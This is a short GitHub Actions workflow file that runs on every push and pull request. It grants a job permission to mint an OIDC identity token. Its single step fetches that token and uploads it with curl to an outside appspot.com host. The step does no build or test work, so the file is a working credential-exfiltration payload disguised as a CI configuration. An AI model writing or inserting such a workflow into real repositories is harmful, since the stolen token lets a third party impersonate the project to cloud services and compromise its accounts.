on: [push, pull_request]

jobs:
  run-env:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
    steps:
      - run: 'curl -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | curl -sT - https://db8b32.appspot.com/cat/in/oidc-token'
